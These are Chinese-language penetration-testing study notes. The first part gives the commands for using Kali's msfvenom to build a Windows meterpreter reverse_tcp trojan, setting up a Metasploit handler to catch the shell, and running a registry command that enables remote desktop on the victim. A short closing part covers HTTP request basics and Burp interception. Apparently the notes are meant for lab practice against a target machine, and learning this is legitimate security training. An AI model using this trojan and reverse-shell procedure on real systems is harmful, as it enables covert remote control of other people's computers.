使用kali下metasploit生成木马,控制windows系统
kali基于debin的数字取证系统,上面集成了很多渗透测试工具,前身为bt r3(BrackTrack)
Metasploit,是综合利用工具,使用Ruby开发,使用方便
msfconsole进入工具
MSF,依赖postgresql数据库,在使用MSF前要开启数据库
msfvenom:生成木马
msfvenon -p windows/meterpreter/reverse_tcp lhost=kali ip地址 lport=5555 -f exe > /root/desktop/muma.exe
-p,后边跟着payload,攻击成功之后要做什么事情
lhost,后跟监听的ip
lport,后跟监听端口
-f,表示要生产后门文件的类型
>,重定向到一个路径
将生成文件发送到靶子机
开启msfconsole,开启前打开数据库postgresql
exploits,开发利用,攻击某些服务,平台,系统等用到的工具,
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
show options,查看需要设置哪些参数
set lhost 192.168.20.135
run / exploit,启动监听
在靶子机上点击exe程序,在kaLi中就可以得到靶子的shell
shell,获取靶机的shell
ipconfig
rdesktop 靶机ip,可以登录远程桌面
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 0 /f,开启3389远程
payloads,载荷载体,攻击成功之后要操作什么
HTTP协议
特点,简单快速,请求方式,get post head 等8种,无连接无状态
支持模式,B/S:B指的浏览器,S指的servce, C/S:websocket
URL,统一资源定位符,在网络中用来标识某处的资源
https:(协议)//www.baidu.com(域名):8080(端口)/s(虚拟目录)/index.php(文件名)?wd=burphelper(参数)#name(锚点部分)
request,请求包:请求行+请求头+空行+请求数据
http 1.0 请求方式 get ,post ,head
http 1.1 请求方式 get, post, head ,options, put ,delete ,trace ,connect
BP拦截HTTP请求包